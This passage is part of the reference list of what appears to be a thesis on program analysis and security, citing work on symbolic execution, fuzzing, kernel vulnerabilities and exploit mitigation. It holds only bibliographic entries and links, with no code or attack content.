[134] Kangjie Lu et al. “UniSan: Proactive Kernel Memory Initialization to Eliminate Data Leakages”. In: ACM Conference on Computer and Communications Security (CCS). 2016. [135] Kangjie Lu et al. “Unleashing Use-Before-Initialization Vulnerabilities in the Linux Kernel Using Targeted Stack Spraying”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [136] Kangjie Lu et al. “Unleashing Use-Before-Initialization Vulnerabilities in the Linux Kernel Using Targeted Stack Spraying”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [137] Aravind Machiry et al. “DR. CHECKER: A Soundy Analysis for Linux Kernel Drivers”. In: USENIX Security Symposium. 2017. [138] Giorgi Maisuradze, Michael Backes, and Christian Rossow. “Dachshund: Digging for and Securing (Non-)Blinded Constants in JIT Code”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [139] Kenneth L McMillan. Symbolic model checking. Springer, 1993. [140] Kenneth L McMillan. “Applications of Craig interpolants in model checking”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2005, pp. 1–12. [141] Florian Merz, Stephan Falke, and Carsten Sinz. “LLBMC: Bounded model checking of C and C++ programs using a compiler IR”. In: Verified Software: Theories, Tools, Experiments. Springer, 2012, pp. 146–161. [142] Metasploit. ExpLib2 Testcase. https://goo.gl/YwodS5. 2017. [143] Microsoft. What is the Windows Integrity Mechanism? http://msdn.microsoft.com/en-us/library/bb625957.aspx. 2014. [144] Alyssa Milburn, Herbert Bos, and Christiano Giuffrida. “SafeInit: Comprehensive and Practical Mitigation of Uninitialized Read Vulnerabilities”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [145] Alyssa Milburn, Herbert Bos, and Cristiano Giuffrida. “SafeInit: Comprehensive and Practical Mitigation of Uninitialized Read Vulnerabilities”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [146] David Molnar, Xue Cong Li, and David A. Wagner. “Dynamic Test Generation to Find Integer Bugs in x86 Binary Linux Programs”. In: USENIX Security Symposium. 2009. [147] David Alexander Molnar et al. Catchconv: Symbolic execution and run-time type inference for integer conversion errors. Tech. rep. UC Berkeley EECS, 2007. [148] Oege de Moor et al. “.QL: Object-Oriented Queries Made Easy”. In: Generative and Transformational Techniques in Software Engineering II: International Summer School, GTTSE 2007, Braga, Portugal, July 2-7, 2007. Revised Papers. 2008. [149] Andreas Moser, Christopher Kruegel, and Engin Kirda. “Limits of Static Analysis for Malware Detection.” In: Annual Computer Security Applications Conference (ACSAC). 2007. 148 References

[150] Madanlal Musuvathi et al. “CMC: A pragmatic approach to model checking real code”. In: ACM SIGOPS Operating Systems Review 36.SI (2002), pp. 75–88. [151] Nicholas Nethercote and Julian Seward. “Valgrind: A program supervision framework”. In: In Third Workshop on Runtime Verification (RV’03. 2003. [152] Nicholas Nethercote and Julian Seward. “Valgrind: A Framework for Heavyweight Dynamic Binary Instrumentation”. In: Proceedings of the 28th ACM SIGPLAN Conference on Programming Language Design and Implementation. PLDI ’07. 2007. [153] James Newsome and Dawn Song. “Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software”. In: Symposium on Network and Distributed System Security (NDSS). 2005. [154] OpenHub. Mozilla Firefox Language Summary. https://goo.gl/Ka32Pp. November 2017. [155] Karl J Ottenstein and Linda M Ottenstein. “The program dependence graph in a software development environment”. In: ACM Sigplan Notices (1984). [156] David J Pearce, Paul HJ Kelly, and Chris Hankin. “Efficient field-sensitive pointer analysis of C”. In: ACM Transactions on Programming Languages and Systems (TOPLAS) 30.1 (2007), 4–es. [157] Alexandre Pelletier. Advanced Exploitation of Internet Explorer Heap Overflow (Pwn2Own 2012 Exploit). http://web.archive.org/web/20141005134545/http: //www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_ Explorer_HeapOv_CVE-2012-1876.php. 2012. [158] Jannik Pewny et al. “Cross-Architecture Bug Search in Binary Executables”. In: IEEE Symposium on Security and Privacy. IEEE. 2015. [159] Sebastian Poeplau and Aurélien Francillon. “Systematic comparison of symbolic execution systems: intermediate representation and its generation”. In: Proceedings of the 35th Annual Computer Security Applications Conference. 2019, pp. 163–176. [160] Sebastian Poeplau and Aurélien Francillon. “Symbolic execution with SymCC: Don’t interpret, compile!” In: 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 2020. [161] Jean-Pierre Queille and Joseph Sifakis. “Specification and verification of concurrent systems in CESAR”. In: International Symposium on Programming. Springer. 1982, pp. 337–351. [162] G. Ramalingam. “The Undecidability of Aliasing”. In: ACM Trans. Program. Lang. Syst. 16.5 (Sept. 1994). [163] David A. Ramos and Dawson Engler. “Under-constrained Symbolic Execution: Correctness Checking for Real Code”. In: USENIX Security Symposium. 2015. [164] Francesco Ranzato. “Complete abstractions everywhere”. In: International Workshop on Verification, Model Checking, and Abstract Interpretation. Springer. 2013. References 149

[165] Rapid7. Metasploit Browser Exploitation Library. https://github.com/rapid7/metasploit- framework/blob/4.15.0/lib/msf/core/exploit/http/server/html.rb. 2015. [166] Charles Reis and Steven D. Gribble. “Isolating Web Programs in Modern Browser Architectures”. In: Proceedings of the 4th ACM European Conference on Computer Systems. 2009. [167] Thomas Reps. “Undecidability of Context-sensitive Data-dependence Analysis”. In: ACM Trans. Program. Lang. Syst. 22.1 (Jan. 2000). [168] Thomas Reps, Susan Horwitz, and Mooly Sagiv. “Precise Interprocedural Dataflow Analysis via Graph Reachability”. In: Proceedings of the 22Nd ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. 1995. [169] Thomas Reps, Stefan Schwoon, and Somesh Jha. “Weighted pushdown systems and their application to interprocedural dataflow analysis”. In: Static Analysis. Springer, 2003, pp. 189–213. [170] John C Reynolds. “Separation logic: A logic for shared mutable data structures”. In: Logic in Computer Science, 2002. Proceedings. 17th Annual IEEE Symposium on. IEEE. 2002, pp. 55–74. [171] S. Richardson and M. Ganapathi. Interprocedural Analysis Useless for Code Optimization. Tech. rep. Stanford, CA, USA, 1987. [172] Noam Rinetzky and Mooly Sagiv. “Interprocedural shape analysis for recursive programs”. In: Compiler Construction. Springer. 2001, pp. 133–149. [173] Roman Rogowski et al. “Revisiting browser security in the modern era: New data-only attacks and defenses”. In: IEEE EuroS&P (2017). [174] Florent Saudel and Jonathan Salwan. “Triton: A Dynamic Symbolic Execution Framework”. In: Symposium sur la sécurité des technologies de l’information et des communications, SSTIC, France, Rennes, June 3-5 2015. SSTIC, 2015, pp. 31–54. [175] Sergej Schumilo et al. “kAFL: Hardware-Assisted Feedback Fuzzing for OS Kernels”. In: USENIX Security Symposium. 2017. [176] E. J. Schwartz, T. Avgerinos, and D. Brumley. “All You Ever Wanted to Know about Dynamic Taint Analysis and Forward Symbolic Execution (but Might Have Been Afraid to Ask)”. In: 2010 IEEE Symposium on Security and Privacy. 2010. [177] Edward J. Schwartz, Thanassis Avgerinos, and David Brumley. “All You Ever Wanted to Know About Dynamic Taint Analysis and Forward Symbolic Execution (but Might Have Been Afraid to Ask)”. In: IEEE Symposium on Security and Privacy. 2010. [178] Robert C. Seacord. The CERT®C Coding Standard, Second Edition: 98 Rules for Developing Safe, Reliable, and Secure Systems. 2nd. Addison-Wesley Professional, 2014. [179] Koushik Sen, Darko Marinov, and Gul Agha. “CUTE: A Concolic Unit Testing Engine for C”. In: Proceedings of the 10th European Software Engineering Conference Held Jointly with 13th ACM SIGSOFT International Symposium on Foundations of Software Engineering. 2005. 150 References

[180] M Sharir and A Pnueli. Two approaches to interprocedural data flow analysis. New York, NY: New York Univ. Comput. Sci. Dept., 1978. [181] Yan Shoshitaishvili et al. “Firmalice-Automatic Detection of Authentication Bypass Vulnerabilities in Binary Firmware.” In: Symposium on Network and Distributed System Security (NDSS). 2015. [182] Yan Shoshitaishvili et al. “SoK: (State of) The Art of War: Offensive Techniques in Binary Analysis”. In: IEEE Symposium on Security and Privacy. 2016. [183] Yan Shoshitaishvili et al. “Rise of the HaCRS: Augmenting Autonomous Cyber Reasoning Systems with Human Assistance”. In: ACM Conference on Computer and Communications Security (CCS). 2017. [184] Josep Silva. “A vocabulary of program slicing-based techniques”. In: ACM computing surveys (CSUR) (2012). [185] Asia Slowinska, Traian Stancescu, and Herbert Bos. “Howard: a dynamic excavator for reverse engineering data structures”. In: Symposium on Network and Distributed System Security (NDSS). San Diego, CA, 2011. [186] Yannis Smaragdakis and George Balatsouras. “Pointer Analysis”. In: Found. Trends Program. Lang. 2.1 (Apr. 2015). [187] Yannis Smaragdakis and Martin Bravenboer. “Using Datalog for Fast and Easy Program Analysis”. In: Proceedings of the First International Conference on Datalog Reloaded. 2011. [188] Dawn Song et al. “BitBlaze: A new approach to computer security via binary analysis”. In: Information systems security. Springer, 2008, pp. 1–25. [189] Alexander Sotirov. “Bypassing memory protections: The future of exploitation”. In: USENIX Security Symposium. 2009. [190] E. Stepanov and K. Serebryany. “MemorySanitizer: Fast detector of uninitialized memory use in C++;” in: 2015 IEEE/ACM International Symposium on Code Generation and Optimization (CGO). 2015. [191] Nick Stephens et al. “Driller: Augmenting Fuzzing Through Selective Symbolic Execution”. In: Symposium on Network and Distributed System Security (NDSS). 2016. [192] Bing Sun, Chong Xu, and Stanley Zhu. The Power of Data-Oriented Attacks: Bypassing Memory Mitigation Using Data-Only Exploitation Technique. 2017. [193] Laszlo Szekeres et al. “SoK: Eternal War in Memory”. In: IEEE Symposium on Security and Privacy. 2013. [194] László Szekeres et al. “SoK: Eternal War in Memory”. In: IEEE Symposium on Security and Privacy. 2013. [195] Mozilla Security Team. CVE-2016-9079: Use-after-free in SVG Animation. https://bugzilla.mozilla.org/show_bug.cgi?id=1321066. [196] Theori-io. Pwn.js. http://theori.io/pwnjs/. 2017. [197] Caroline Tice et al. “Enforcing Forward-Edge Control-Flow Integrity in GCC & LLVM”. In: USENIX Security Symposium. 2014. [198] Axel Tillequin. Amoco. https://github.com/bdcht/amoco. 2016. References 151

[199] David Trabish et al. “Chopped Symbolic Execution”. In: International Conference on Software Engineering (ICSE 2018). 2018. [200] TrailOfBits. DARPA Challenge Binaries on Linux, OS X, and Windows. Accessed 2018-01-22. url: https://github.com/trailofbits/cb-multios. [201] travitch. A Concurrent WLLVM in Go. Accessed 2019-01-15. url: https://github.com/SRI-CSL/gllvm. [202] travitch. Whole Program LLVM. Accessed 2018-01-15. url: https://github.com/travitch/whole-program-llvm. [203] Chris Valasek. HeapLib2.0. http://blog.ioactive.com/2013/11/heaplib-20.html. 2013. [204] Michael James Van Emmerik. “Static single assignment for decompilation”. PhD thesis. The University of Queensland, 2007. [205] Victor van der Veen et al. “The Dynamics of Innocent Flesh on the Bone: Code Reuse Ten Years Later”. In: ACM Conference on Computer and Communications Security (CCS). 2017. [206] VMware. Differential Datalog (DDlog). https://github.com/vmware/differential-datalog. 2020. [207] Sebastian Vogl et al. “Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data”. In: USENIX Security Symposium. 2014. [208] Junjie Wang et al. “Skyfire: Data-driven seed generation for fuzzing”. In: IEEE Symposium on Security and Privacy. 2017. [209] Tielei Wang et al. “IntScope: Automatically Detecting Integer Overflow Vulnerability in X86 Binary Using Symbolic Execution.” In: NDSS. Citeseer. 2009. [210] Xi Wang et al. “Undefined Behavior: What Happened to My Code?” In: Proceedings of the Asia-Pacific Workshop on Systems. 2012. [211] Mark Weiser. “Program slicing”. In: IEEE Transactions on software engineering (1984). [212] John Whaley et al. “Using Datalog with Binary Decision Diagrams for Program Analysis”. In: Proceedings of the Third Asian Conference on Programming Languages and Systems. APLAS’05. 2005. [213] Fabian Yamaguchi et al. “Modeling and Discovering Vulnerabilities with Code Property Graphs”. In: Proceedings of the 2014 IEEE Symposium on Security and Privacy. IEEE Computer Society, 2014. [214] Xuejun Yang et al. “Finding and Understanding Bugs in C Compilers”. In: Proceedings of the 32nd ACM SIGPLAN Conference on Programming Language Design and Implementation. 2011. [215] Ding Ye, Yulei Sui, and Jingling Xue. “Accelerating Dynamic Detection of Uses of Undefined Values with Static Value-Flow Analysis”. In: Proceedings of Annual IEEE/ACM International Symposium on Code Generation and Optimization. 2014. [216] Insu Yun et al. “QSYM: A practical concolic execution engine tailored for hybrid fuzzing”. In: USENIX Security Symposium. 2018. 152 References

[217] ZDI. CVE-2011-1346, (Pwn2Own) Microsoft Internet Explorer Uninitialized Variable Information Leak Vulnerability. http://www.zerodayinitiative.com/advisories/ZDI-11-198/. [218] Chao Zhang et al. “Practical Control-Flow Integrity and Randomization for Binary Executables”. In: IEEE Symposium on Security and Privacy. 2013. [219] Jian Zhang and Xiaoxu Wang. “A constraint solver and its application to path feasibility analysis”. In: International Journal of Software Engineering and Knowledge Engineering 11.02 (2001), pp. 139–156. [220] Mingwei Zhang and R. Sekar. “Control-Flow Integrity for COTS Binaries”. In: USENIX Security Symposium. 2013.